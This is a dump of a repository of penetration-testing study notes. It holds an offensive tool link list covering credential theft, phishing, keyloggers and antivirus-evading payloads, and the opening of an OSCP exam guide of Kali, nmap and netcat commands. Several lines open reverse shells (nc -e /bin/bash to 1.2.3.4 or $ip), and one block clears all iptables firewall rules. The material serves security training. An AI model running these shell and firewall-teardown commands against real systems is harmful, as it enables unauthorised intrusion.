├── InfoSec-Learning-Materials
├── Bug B0unty.md
├── Multiple Pentest Tools.md
├── OSCP-Survival-Guide.md
├── Process.md
├── README.md
├── Useful Pentest Commands.md
├── Useful Snippets.md
└── todo.md
└── README.md
/InfoSec-Learning-Materials/Bug B0unty.md:
--------------------------------------------------------------------------------
1 | # Web Bug Bounty Resources / Writeups
2 |
3 | ## Recon
4 | ### Writeups
5 |
6 |
7 | ### Tools
8 |
9 | ### General
10 | [What tools I use for my recon during #BugBounty](https://medium.com/bugbountywriteup/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d)
11 |
12 |
13 | ## Vulnerability Discovery / Fuzzing
14 | ### Writeups
15 |
16 | ### Tools
17 |
18 | ## Exploiting
19 | ### Writeups
20 |
21 | ### Tools
22 |
23 |
24 | ## General Methodology
25 | ### Writeups
26 |
27 | ### Tools
28 |
29 | ## Reporting
30 |
31 | ## Full Writeups
32 | [Paypal: Expression Language Injection](https://medium.com/@adrien_jeanneau/how-i-was-able-to-list-some-internal-information-from-paypal-bugbounty-ca8d217a397c)
33 |
34 | ## Misc.
35 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/Multiple Pentest Tools.md:
--------------------------------------------------------------------------------
1 | # Multiple Pentest Tools
2 |
3 |
4 |
5 | ## General:
6 |
7 | [Cheatsheets - Penetration Testing/Security Cheatsheets](https://github.com/jshaw87/Cheatsheets)
8 |
9 | [awesome-pentest - penetration testing resources](https://github.com/Hack-with-Github/Awesome-Hacking)
10 |
11 | [Red-Team-Infrastructure-Wiki - Red Team infrastructure hardening resources ](https://github.com/bluscreenofjeff/)Red-Team-Infrastructure-Wiki
12 |
13 | [Infosec_Reference - Information Security Reference](https://github.com/rmusser01/Infosec_Reference)
14 |
15 |
16 |
17 | ## Web Services:
18 |
19 | [JettyBleed - Jetty HttpParser Error Remote Memory Disclosure](https://github.com/AppSecConsulting/Pentest-Tools)
20 |
21 | [clusterd - Jboss/Coldfusion/WebLogic/Railo/Tomcat/Axis2/Glassfish](https://github.com/hatRiot/clusterd)
22 |
23 | [xsser - From XSS to RCE wordpress/joomla](https://github.com/Varbaek/xsser)
24 |
25 | [Java-Deserialization-Exploit - weaponizes ysoserial code to gain a remote shell](https://github.com/njfox/)Java-Deserialization-Exploit
26 |
27 | [CMSmap - CMS scanner](https://github.com/Dionach/CMSmap)
28 |
29 | [wordpress-exploit-framework - penetration testing of WordPress](https://github.com/rastating/wordpress-exploit-framework)
30 |
31 | [joomlol - Joomla User-Agent/X-Forwarded-For RCE ](https://github.com/compoterhacker/joomlol)
32 |
33 | [joomlavs - Joomla vulnerability scanner](https://github.com/rastating/joomlavs)
34 |
35 | [mongoaudit - MongoDB auditing and pentesting tool](https://github.com/stampery/mongoaudit)
36 |
37 | [davscan - Fingerprints servers, finds exploits, scans WebDAV](https://github.com/Graph-X/davscan)
38 |
39 |
40 |
41 | ## Web Applications:
42 |
43 | [HandyHeaderHacker - Examine HTTP response headers for common security issues](https://github.com/vpnguy/HandyHeaderHacker)
44 |
45 | [OpenDoor - OWASP Directory Access scanner](https://github.com/stanislav-web/OpenDoor)
46 |
47 | [ASH-Keylogger - simple keylogger application for XSS attack](https://github.com/AnonymousSecurityHackers/ASH-Keylogger)
48 |
49 | [tbhm - The Bug Hunters Methodology ](https://github.com/jhaddix/tbhm)
50 |
51 | [commix - command injection](https://github.com/commixproject/commix)
52 |
53 | [NoSQLMap - Mongo database and NoSQL](https://github.com/tcstool/NoSQLMap)
54 |
55 | [xsshunter - Second order XSS](https://github.com/mandatoryprogrammer/xsshunter)
56 |
57 |
58 |
59 | ## Burp Extensions:
60 |
61 | [backslash-powered-scanner - unknown classes of injection vulnerabilities](https://github.com/PortSwigger/backslash-powered-scanner)
62 |
63 | [BurpSmartBuster - content discovery plugin](https://github.com/pathetiq/BurpSmartBuster)
64 |
65 | [ActiveScanPlusPlus - extends Burp Suite's active and passive scanning capabilities](https://github.com/albinowax/ActiveScanPlusPlus)
66 |
67 |
68 |
69 | ## Local privilege escalation:
70 |
71 | [yodo - become root via limited sudo permissions](https://github.com/b3rito/yodo)
72 |
73 | [Pa-th-zuzu - Checks for PATH substitution vulnerabilities](https://github.com/ShotokanZH/Pa-th-zuzu)
74 |
75 | [sudo-snooper - acts like the original sudo binary to fool users](https://github.com/xorond/sudo-snooper)
76 |
77 | [RottenPotato - local privilege escalation from service account ](https://github.com/foxglovesec/RottenPotato)
78 |
79 | [UACMe - Windows AutoElevate backdoor](https://github.com/hfiref0x/UACME)
80 |
81 | [Invoke-LoginPrompt - Invokes a Windows Security Login Prompt](https://github.com/enigma0x3/Invoke-LoginPrompt)
82 |
83 | [Exploits-Pack - Exploits for getting local root on Linux](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
84 |
85 | [windows-privesc-check - Standalone Executable](https://github.com/pentestmonkey/windows-privesc-check)
86 |
87 | [unix-privesc-check - simple privilege escalation vectors](https://github.com/pentestmonkey/unix-privesc-check)
88 |
89 | [LinEnum - local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum)
90 |
91 | [cowcron - Cronbased Dirty Cow Exploit](https://github.com/securifera/cowcron)
92 |
93 | [WindowsExploits - Precompiled Windows exploits](https://github.com/abatchy17/WindowsExploits)
94 |
95 | [Privilege-Escalation - common local exploits and enumeration scripts ](https://github.com/AusJock/Privilege-Escalation)
96 |
97 | [Unix-Privilege-Escalation-Exploits-Pack](https://github.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack)
98 |
99 | [Sherlock - PowerShell script to quickly find missing software patches](https://github.com/rasta-mouse/Sherlock)
100 |
101 | [GTFOBins - list of Unix binaries that can be exploited to bypass system security restrictions](https://github.com/GTFOBins/)GTFOBins.github.io
102 |
103 |
104 |
105 | ## Phishing:
106 |
107 | [eyephish - find similar looking domain names](https://github.com/phar/eyephish)
108 |
109 | [luckystrike - A PowerShell based utility for the creation of malicious Office macro documents](https://github.com/Shellntel/)luckystrike
110 |
111 | [phishery - Basic Auth Credential Harvester with a Word Document Template URL Injector ](https://github.com/ryhanson/phishery)
112 |
113 | [WordSteal - steal NTLM hashes](https://github.com/0x090x0/WordSteal)
114 |
115 | [ReelPhish - Real-Time Two-Factor Phishing Tool](https://github.com/fireeye/ReelPhish)
116 |
117 |
118 |
119 | ## Open Source Intelligence:
120 |
121 | [truffleHog - Searches through git repositories for high entropy strings](https://github.com/dxa4481/truffleHog)
122 |
123 | [Altdns - Subdomain discovery](https://github.com/infosec-au/altdns)
124 |
125 | [github-dorks - reveal sensitive personal and/or organizational information](https://github.com/techgaun/github-dorks)
126 |
127 | [gitrob - find sensitive information](https://github.com/michenriksen/gitrob)
128 |
129 | [Bluto - DNS Recon , Email Enumeration](https://github.com/darryllane/Bluto)
130 |
131 | [SimplyEmail - Email recon](https://github.com/killswitch-GUI/SimplyEmail)
132 |
133 | [Sublist3r - Fast subdomains enumeration tool for penetration testers ](https://github.com/aboul3la/Sublist3r)
134 |
135 | [snitch - information gathering via dorks ](https://github.com/Smaash/snitch)
136 |
137 | [RTA - scan all company's online facing assets](https://github.com/flipkart-incubator/RTA)
138 |
139 | [InSpy - LinkedIn enumeration tool](https://github.com/gojhonny/InSpy)
140 |
141 | [LinkedInt - LinkedIn scraper for reconnaissance](https://github.com/mdsecactivebreach/LinkedInt)
142 |
143 |
144 |
145 | ## Post-exploitation:
146 |
147 | [MailSniper - searching through email in a Microsoft Exchange ](https://github.com/dafthack/MailSniper)
148 |
149 | [Windows-Exploit-Suggester - patch levels against vulnerability database](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
150 |
151 | [dnscat2-powershell - A Powershell client for dnscat2, an encrypted DNS command and control tool](https://github.com/lukebaggett/)dnscat2-powershell
152 |
153 | [lazykatz - xtract credentials from remote targets protected with AV ](https://github.com/bhdresh/lazykatz)
154 |
155 | [nps - Not PowerShell](https://github.com/Ben0xA/nps)
156 |
157 | [Invoke-Vnc - Powershell VNC injector](https://github.com/artkond/Invoke-Vnc)
158 |
159 | [spraywmi - mass spraying Unicorn PowerShell injection](https://github.com/trustedsec/spraywmi)
160 |
161 | [redsnarf - for retrieving hashes and credentials from Windows workstations](https://github.com/nccgroup/redsnarf)
162 |
163 | [HostRecon - situational awareness](https://github.com/dafthack/HostRecon)
164 |
165 | [mimipenguin - login password from the current linux user ](https://github.com/huntergregal/mimipenguin)
166 |
167 | [rpivot - socks4 reverse proxy for penetration testing ](https://github.com/artkond/rpivot)
168 |
169 |
170 |
171 | ## Looting:
172 |
173 | [cookie_stealer - steal cookies from firefox cookies databas](https://github.com/rash2kool/cookie_stealer)
174 |
175 | [Wifi-Dumper - dump the wifi profiles and cleartext passwords of the connected access points](https://github.com/Viralmaniar/)Wifi-Dumper
176 |
177 | [WebLogicPasswordDecryptor - decrypt WebLogic passwords](https://github.com/NetSPI/WebLogicPasswordDecryptor)
178 |
179 | [jenkins-decrypt - Credentials dumper for Jenkins](https://github.com/tweksteen/jenkins-decrypt)
180 |
181 | [mimikittenz - ReadProcessMemory() in order to extract plain-text passwords](https://github.com/putterpanda/mimikittenz)
182 |
183 | [LaZagne - Credentials recovery project](https://github.com/AlessandroZ/LaZagne)
184 |
185 | [SessionGopher - extract WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop](https://github.com/fireeye/SessionGopher)
186 |
187 | [BrowserGather - Fileless web browser information extraction](https://github.com/sekirkity/BrowserGather)
188 |
189 | [windows_sshagent_extract - extract private keys from Windows 10's built in ssh-agent service](https://github.com/ropnop/)windows_sshagent_extract
190 |
191 |
192 |
193 | ## Network Hunting:
194 |
195 | [Sticky-Keys-Slayer - Scans for accessibility tools backdoors via RDP](https://github.com/linuz/Sticky-Keys-Slayer)
196 |
197 | [DomainPasswordSpray - password spray attack against users of a domain](https://github.com/dafthack/DomainPasswordSpray)
198 |
199 | [BloodHound - reveal relationships within an Active Directory](https://github.com/adaptivethreat/BloodHound)
200 |
201 | [APT2 - An Automated Penetration Testing Toolkit](https://github.com/MooseDojo/apt2)
202 |
203 | [CredNinja - identify if credentials are valid](https://github.com/Raikia/CredNinja)
204 |
205 | [EyeWitness - take screenshots of websites](https://github.com/ChrisTruncer/EyeWitness)
206 |
207 | [gowitness - a golang, web screenshot utility](https://github.com/sensepost/gowitness)
208 |
209 | [PowerUpSQL - PowerShell Toolkit for Attacking SQL Server](https://github.com/NetSPI/PowerUpSQL)
210 |
211 | [sparta - scanning and enumeration](https://github.com/SECFORCE/sparta)
212 |
213 | [Sn1per - Automated Pentest Recon Scanner](https://github.com/1N3/Sn1per)
214 |
215 | [PCredz - This tool extracts creds from a pcap file or from a live interface](https://github.com/lgandx/PCredz)
216 |
217 | [ridrelay - Enumerate usernames on a domain where you have no creds](https://github.com/skorov/ridrelay)
218 |
219 |
220 |
221 | ## Wireless:
222 |
223 | [air-hammer - WPA Enterprise horizontal brute-force](https://github.com/Wh1t3Rh1n0/air-hammer)
224 |
225 | [mana - toolkit for wifi rogue AP attacks](https://github.com/sensepost/mana)
226 |
227 | [crEAP - Harvesting Users on Enterprise Wireless Networks](https://github.com/Shellntel/scripts)
228 |
229 | [wifiphisher - phishing attacks against Wi-Fi clients ](https://github.com/sophron/wifiphisher)
230 |
231 |
232 |
233 | ## Man in the Middle:
234 |
235 | [mitmproxy - An interactive TLS-capable intercepting HTTP proxy](https://github.com/mitmproxy/mitmproxy)
236 |
237 | [bettercap - bettercap](https://github.com/evilsocket/bettercap)
238 |
239 | [MITMf - Framework for Man-In-The-Middle attacks ](https://github.com/byt3bl33d3r/MITMf)
240 |
241 | [Gifts/Responder - Responder for old python](https://github.com/Gifts/Responder)
242 |
243 | [mitm6 - pwning IPv4 via IPv6 ](https://github.com/fox-it/mitm6)
244 |
245 | [shelljack - man-in-the-middle pseudoterminal injection](https://github.com/emptymonkey/shelljack)
246 |
247 |
248 |
249 | ## Physical:
250 |
251 | [Brutal - Payload for teensy](https://github.com/Screetsec/Brutal)
252 |
253 | [poisontap - Exploits locked/password protected computers over USB](https://github.com/samyk/poisontap)
254 |
255 | [OverThruster - HID attack payload generator for Arduinos](https://github.com/RedLectroid/OverThruster)
256 |
257 | [Paensy - An attacker-oriented library for the Teensy 3.1 microcontroller](https://github.com/Ozuru/Paensy)
258 |
259 | [Kautilya - Payloads for a Human Interface Device](https://github.com/samratashok/Kautilya)
260 |
261 |
262 |
263 | ## Payloads:
264 |
265 | [JavaReverseTCPShell - Spawns a reverse TCP shell in Java](https://github.com/quantumvm/JavaReverseTCPShell)
266 |
267 | [splunk_shells - Splunk with reverse and bind shells](https://github.com/TBGSecurity/splunk_shells)
268 |
269 | [pyshell - shellify Your HTTP Command Injection](https://github.com/praetorian-inc/pyshell)
270 |
271 | [RobotsDisallowed - harvest of the Disallowed directories](https://github.com/danielmiessler/RobotsDisallowed)
272 |
273 | [SecLists - collection of multiple types of lists](https://github.com/danielmiessler/SecLists)
274 |
275 | [Probable-Wordlists - Wordlists sorted by probability](https://github.com/berzerk0/Probable-Wordlists)
276 |
277 | [ARCANUS - payload generator/handler. ](https://github.com/EgeBalci/ARCANUS)
278 |
279 | [Winpayloads - Undetectable Windows Payload Generation ](https://github.com/nccgroup/Winpayloads)
280 |
281 | [weevely3 - Weaponized web shell ](https://github.com/epinna/weevely3)
282 |
283 | [fuzzdb - Dictionary of attack patterns](https://github.com/fuzzdb-project/fuzzdb)
284 |
285 | [payloads - web attack payloads](https://github.com/foospidy/payloads)
286 |
287 | [HERCULES - payload generator that can bypass antivirus](https://github.com/EgeBalci/HERCULES)
288 |
289 | [Insanity-Framework - Generate Payloads](https://github.com/4w4k3/Insanity-Framework)
290 |
291 | [Brosec - An interactive reference tool for payloads](https://github.com/gabemarshall/Brosec)
292 |
293 | [MacroShop - delivering payloads via Office Macros](https://github.com/khr0x40sh/MacroShop)
294 |
295 | [Demiguise - HTA encryption tool](https://github.com/nccgroup/demiguise)
296 |
297 | [ClickOnceGenerator - Quick Malicious ClickOnceGenerator](https://github.com/Mr-Un1k0d3r/ClickOnceGenerator)
298 |
299 | [PayloadsAllTheThings - A list of useful payloads](https://github.com/swisskyrepo/PayloadsAllTheThings)
300 |
301 |
302 |
303 |
304 |
305 | ## Apple:
306 |
307 | [MMeTokenDecrypt - Decrypts and extracts iCloud and MMe authorization tokens](https://github.com/manwhoami/MMeTokenDecrypt)
308 |
309 | [OSXChromeDecrypt - Decrypt Google Chrome and Chromium Passwords on Mac OS X](https://github.com/manwhoami/OSXChromeDecrypt)
310 |
311 | [EggShell - iOS and OS X Surveillance Tool](https://github.com/neoneggplant/EggShell)
312 |
313 | [bonjour-browser - command line tool to browse for Bonjour](https://github.com/watson/bonjour-browser)
314 |
315 | [logKext - open source keylogger for Mac OS X](https://github.com/SlEePlEs5/logKext)
316 |
317 | [OSXAuditor - OS X computer forensics tool](https://github.com/jipegit/OSXAuditor)
318 |
319 | [davegrohl - Password Cracker for OS X](https://github.com/octomagon/davegrohl)
320 |
321 | [chainbreaker - Mac OS X Keychain Forensic Tool](https://github.com/n0fate/chainbreaker)
322 |
323 | [FiveOnceInYourLife - Local osx dialog box phishing](https://github.com/fuzzynop/FiveOnceInYourLife)
324 |
325 | [ARD-Inspector - ecrypt the Apple Remote Desktop database](https://github.com/ygini/ARD-Inspector)
326 |
327 | [keychaindump - reading OS X keychain passwords](https://github.com/juuso/keychaindump)
328 |
329 | [Bella - python, post-exploitation, data mining tool](https://github.com/manwhoami/Bella)
330 |
331 | [EvilOSX - pure python, post-exploitation, RAT](https://github.com/Marten4n6/EvilOSX)
332 |
333 |
334 |
335 | ## Captive Portals:
336 |
337 | [cpscam - Bypass captive portals by impersonating inactive users](https://github.com/codewatchorg/cpscam)
338 |
339 |
340 |
341 | ## Passwords:
342 |
343 | [pipal - password analyser](https://github.com/digininja/pipal)
344 |
345 | [wordsmith - assist with creating tailored wordlists](https://github.com/skahwah/wordsmith)
346 |
347 |
348 |
349 | ## Obfuscation:
350 |
351 | [ObfuscatedEmpire - fork of Empire with Invoke-Obfuscation integrated directly in](https://github.com/cobbr/ObfuscatedEmpire)
352 |
353 | [obfuscate_launcher - Simple script for obfuscating payload launchers](https://github.com/jamcut/obfuscate_launcher)
354 |
355 | [Invoke-CradleCrafter - Download Cradle Generator & Obfuscator](https://github.com/danielbohannon/Invoke-CradleCrafter)
356 |
357 | [Invoke-Obfuscation - PowerShell Obfuscator](https://github.com/danielbohannon/Invoke-Obfuscation)
358 |
359 | [nps_payload - payloads for basic intrusion detection avoidance](https://github.com/trustedsec/nps_payload)
360 |
361 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/OSCP-Survival-Guide.md:
--------------------------------------------------------------------------------
1 | # OSCP-Survival-Guide
2 |
3 | _____ _____ _____ ______ _____ _ _ _____ _ _
4 | | _ / ___/ __ \| ___ \ / ___| (_) | | | __ \ (_) | |
5 | | | | \ `--.| / \/| |_/ / \ `--. _ _ _ ____ _____ ____ _| | | | \/_ _ _ __| | ___
6 | | | | |`--. \ | | __/ `--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \
7 | \ \_/ /\__/ / \__/\| | /\__/ / |_| | | \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| | __/
8 | \___/\____/ \____/\_| \____/ \__,_|_| \_/ |_| \_/ \__,_|_| \____/\__,_|_|\__,_|\___|
9 |
10 | Kali Linux Offensive Security Certified Professional Playbook
11 |
12 | **NOTE: This document reffers to the target ip as the export variable $ip.**
13 |
14 | **To set this value on the command line use the following syntax:**
15 |
16 | **export ip=192.168.1.100**
17 |
18 |
19 | ***UPDATE: October 2, 2017***
20 | Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly ... but I recorded a stop motion video of my failed attempt. TRY HARDER!
21 |
22 | https://www.youtube.com/watch?v=HBMZWl9zcsc
23 |
24 | The good news is that I will be learning more and adding more content to this guide :D
25 |
26 |
27 | ## Table of Contents
28 | - [Kali Linux](#kali-linux)
29 | - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
30 | * [Passive Information Gathering](#passive-information-gathering)
31 | * [Active Information Gathering](#active-information-gathering)
32 | * [Port Scanning](#port-scanning)
33 | * [Enumeration](#enumeration)
34 | * [HTTP Enumeration](#http-enumeration)
35 | - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
36 | - [Shells](#shells)
37 | - [File Transfers](#file-transfers)
38 | - [Privilege Escalation](#privilege-escalation)
39 | * [Linux Privilege Escalation](#linux-privilege-escalation)
40 | * [Windows Privilege Escalation](#windows-privilege-escalation)
41 | - [Client, Web and Password Attacks](#client-web-and-password-attacks)
42 | * [Client Attacks](#client-attacks)
43 | * [Web Attacks](#web-attacks)
44 | * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
45 | * [Database Vulnerabilities](#database-vulnerabilities)
46 | * [Password Attacks](#password-attacks)
47 | * [Password Hash Attacks](#password-hash-attacks)
48 | - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
49 | - [The Metasploit Framework](#the-metasploit-framework)
50 | - [Bypassing Antivirus Software](#bypassing-antivirus-software)
51 |
52 | Kali Linux
53 | ========================================================================================================
54 |
55 | - Set the Target IP Address to the `$ip` system variable
56 | `export ip=192.168.1.100`
57 |
58 | - Find the location of a file
59 | `locate sbd.exe`
60 |
61 | - Search through directories in the `$PATH` environment variable
62 | `which sbd`
63 |
64 | - Find a search for a file that contains a specific string in it’s
65 | name:
66 | `find / -name sbd\*`
67 |
68 | - Show active internet connections
69 | `netstat -lntp`
70 |
71 | - Change Password
72 | `passwd`
73 |
74 | - Verify a service is running and listening
75 | `netstat -antp |grep apache`
76 |
77 | - Start a service
78 | `systemctl start ssh `
79 |
80 | `systemctl start apache2`
81 |
82 | - Have a service start at boot
83 | `systemctl enable ssh`
84 |
85 | - Stop a service
86 | `systemctl stop ssh`
87 |
88 | - Unzip a gz file
89 | `gunzip access.log.gz`
90 |
91 | - Unzip a tar.gz file
92 | `tar -xzvf file.tar.gz`
93 |
94 | - Search command history
95 | `history | grep phrase_to_search_for`
96 |
97 | - Download a webpage
98 | `wget http://www.cisco.com`
99 |
100 | - Open a webpage
101 | `curl http://www.cisco.com`
102 |
103 | - String manipulation
104 |
105 | - Count number of lines in file
106 | `wc index.html`
107 |
108 | - Get the start or end of a file
109 | `head index.html`
110 |
111 | `tail index.html`
112 |
113 | - Extract all the lines that contain a string
114 | `grep "href=" index.html`
115 |
116 | - Cut a string by a delimiter, filter results then sort
117 | `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`
118 |
119 | - Using Grep and regular expressions and output to a file
120 | `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt`
121 |
122 | - Use a bash loop to find the IP address behind each host
123 | `for url in $(cat list.txt); do host $url; done`
124 |
125 | - Collect all the IP Addresses from a log file and sort by
126 | frequency
127 | `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
128 |
129 | - Decoding using Kali
130 |
131 | - Decode Base64 Encoded Values
132 |
133 | `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`
134 |
135 | - Decode Hexidecimal Encoded Values
136 | `echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps`
137 |
138 | - Netcat - Read and write TCP and UDP Packets
139 |
140 | - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):
141 | [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)
142 |
143 | - Connect to a POP3 mail server
144 | `nc -nv $ip 110`
145 |
146 | - Listen on TCP/UDP port
147 | `nc -nlvp 4444`
148 |
149 | - Connect to a netcat port
150 | `nc -nv $ip 4444`
151 |
152 | - Send a file using netcat
153 | `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
154 |
155 | - Receive a file using netcat
156 | `nc -nlvp 4444 > incoming.exe`
157 |
158 | - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...
159 |
160 | whereis nc
161 | nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
162 |
163 | /bin/nc.traditional -e /bin/bash 1.2.3.4 4444
164 |
165 |
166 | - Create a reverse shell with Ncat using cmd.exe on Windows
167 | `nc.exe -nlvp 4444 -e cmd.exe`
168 |
169 | or
170 |
171 | `nc.exe -nv -e cmd.exe`
172 |
173 | - Create a reverse shell with Ncat using bash on Linux
174 | `nc -nv $ip 4444 -e /bin/bash`
175 |
176 | - Netcat for Banner Grabbing:
177 |
178 | `echo "" | nc -nv -w1 `
179 |
180 | - Ncat - Netcat for Nmap project which provides more security avoid
181 | IDS
182 |
183 | - Reverse shell from windows using cmd.exe using ssl
184 | `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
185 |
186 | - Listen on port 4444 using ssl
187 | `ncat -v $ip 4444 --ssl`
188 |
189 | - Wireshark
190 | - Show only SMTP (port 25) and ICMP traffic:
191 |
192 | `tcp.port eq 25 or icmp`
193 |
194 | - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
195 |
196 | `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
197 |
198 | - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
199 |
200 | `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
201 |
202 | - Some commands are equal
203 |
204 | `ip.addr == xxx.xxx.xxx.xxx`
205 |
206 | Equals
207 |
208 | `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `
209 |
210 | ` ip.addr != xxx.xxx.xxx.xxx`
211 |
212 | Equals
213 |
214 | `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`
215 |
216 | - Tcpdump
217 |
218 | - Display a pcap file
219 | `tcpdump -r passwordz.pcap`
220 |
221 | - Display ips and filter and sort
222 | `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`
223 |
224 | - Grab a packet capture on port 80
225 | `tcpdump tcp port 80 -w output.pcap -i eth0`
226 |
227 | - Check for ACK or PSH flag set in a TCP packet
228 | `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`
229 |
230 | - IPTables
231 |
232 | - Deny traffic to ports except for Local Loopback
233 |
234 | `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP `
235 |
236 | `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`
237 |
238 | - Clear ALL IPTables firewall rules
239 |
240 | iptables -P INPUT ACCEPT
241 | iptables -P FORWARD ACCEPT
242 | iptables -P OUTPUT ACCEPT
243 | iptables -t nat -F
244 | iptables -t mangle -F
245 | iptables -F
246 | iptables -X
247 | iptables -t raw -F iptables -t raw -X
248 |
249 | Information Gathering & Vulnerability Scanning
250 | ===================================================================================================================================
251 |
252 | - Passive Information Gathering
253 | ---------------------------------------------------------------------------------------------------------------------------
254 |
255 | - Google Hacking
256 |
257 | - Google search to find website sub domains
258 | `site:microsoft.com`
259 |
260 | - Google filetype, and intitle
261 | `intitle:"netbotz appliance" "OK" -filetype:pdf`
262 |
263 | - Google inurl
264 | `inurl:"level/15/sexec/-/show"`
265 |
266 | - Google Hacking Database:
267 | https://www.exploit-db.com/google-hacking-database/
268 |
269 | - SSL Certificate Testing
270 | [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)
271 |
272 | - Email Harvesting
273 |
274 | - Simply Email
275 | `git clone https://github.com/killswitch-GUI/SimplyEmail.git `
276 |
277 | `./SimplyEmail.py -all -e TARGET-DOMAIN`
278 |
279 | - Netcraft
280 |
281 | - Determine the operating system and tools used to build a site
282 | https://searchdns.netcraft.com/
283 |
284 | - Whois Enumeration
285 | `whois domain-name-here.com `
286 |
287 | `whois $ip`
288 |
289 | - Banner Grabbing
290 |
291 | - `nc -v $ip 25`
292 |
293 | - `telnet $ip 25`
294 |
295 | - `nc TARGET-IP 80`
296 |
297 | - Recon-ng - full-featured web reconnaissance framework written in Python
298 |
299 | - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
300 |
301 | `cd /opt/recon-ng `
302 |
303 | `./recon-ng `
304 |
305 | `show modules `
306 |
307 | `help`
308 |
309 | - Active Information Gathering
310 | --------------------------------------------------------------------------------------------------------------------------
311 |
312 |
313 |
314 |
315 | - Port Scanning
316 | -----------------------------------------------------------------------------------------------------------
317 | *Subnet Reference Table*
318 |
319 | / | Addresses | Hosts | Netmask | Amount of a Class C
320 | --- | --- | --- | --- | ---
321 | /30 | 4 | 2 | 255.255.255.252| 1/64
322 | /29 | 8 | 6 | 255.255.255.248 | 1/32
323 | /28 | 16 | 14 | 255.255.255.240 | 1/16
324 | /27 | 32 | 30 | 255.255.255.224 | 1/8
325 | /26 | 64 | 62 | 255.255.255.192 | 1/4
326 | /25 | 128 | 126 | 255.255.255.128 | 1/2
327 | /24 | 256 | 254 | 255.255.255.0 | 1
328 | /23 | 512 | 510 | 255.255.254.0 | 2
329 | /22 | 1024 | 1022 | 255.255.252.0 | 4
330 | /21 | 2048 | 2046 | 255.255.248.0 | 8
331 | /20 | 4096 | 4094 | 255.255.240.0 | 16
332 | /19 | 8192 | 8190 | 255.255.224.0 | 32
333 | /18 | 16384 | 16382 | 255.255.192.0 | 64
334 | /17 | 32768 | 32766 | 255.255.128.0 | 128
335 | /16 | 65536 | 65534 | 255.255.0.0 | 256
336 |
337 | - Set the ip address as a varble
338 | `export ip=192.168.1.100 `
339 | `nmap -A -T4 -p- $ip`
340 |
341 | - Netcat port Scanning
342 | `nc -nvv -w 1 -z $ip 3388-3390`
343 |
344 | - Discover active IPs usign ARP on the network:
345 | `arp-scan $ip/24`
346 |
347 | - Discover who else is on the network
348 | `netdiscover`
349 |
350 | - Discover IP Mac and Mac vendors from ARP
351 | `netdiscover -r $ip/24`
352 |
353 | - Nmap stealth scan using SYN
354 | `nmap -sS $ip`
355 |
356 | - Nmap stealth scan using FIN
357 | `nmap -sF $ip`
358 |
359 | - Nmap Banner Grabbing
360 | `nmap -sV -sT $ip`
361 |
362 | - Nmap OS Fingerprinting
363 | `nmap -O $ip`
364 |
365 | - Nmap Regular Scan:
366 | `nmap $ip/24`
367 |
368 | - Enumeration Scan
369 | `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
370 |
371 | - Enumeration Scan All Ports TCP / UDP and output to a txt file
372 | `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
373 |
374 | - Nmap output to a file:
375 | `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
376 |
377 | - Quick Scan:
378 | `nmap -T4 -F $ip/24`
379 |
380 | - Quick Scan Plus:
381 | `nmap -sV -T4 -O -F --version-light $ip/24`
382 |
383 | - Quick traceroute
384 | `nmap -sn --traceroute $ip`
385 |
386 | - All TCP and UDP Ports
387 | `nmap -v -sU -sS -p- -A -T4 $ip`
388 |
389 | - Intense Scan:
390 | `nmap -T4 -A -v $ip`
391 |
392 | - Intense Scan Plus UDP
393 | `nmap -sS -sU -T4 -A -v $ip/24`
394 |
395 | - Intense Scan ALL TCP Ports
396 | `nmap -p 1-65535 -T4 -A -v $ip/24`
397 |
398 | - Intense Scan - No Ping
399 | `nmap -T4 -A -v -Pn $ip/24`
400 |
401 | - Ping scan
402 | `nmap -sn $ip/24`
403 |
404 | - Slow Comprehensive Scan
405 | `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
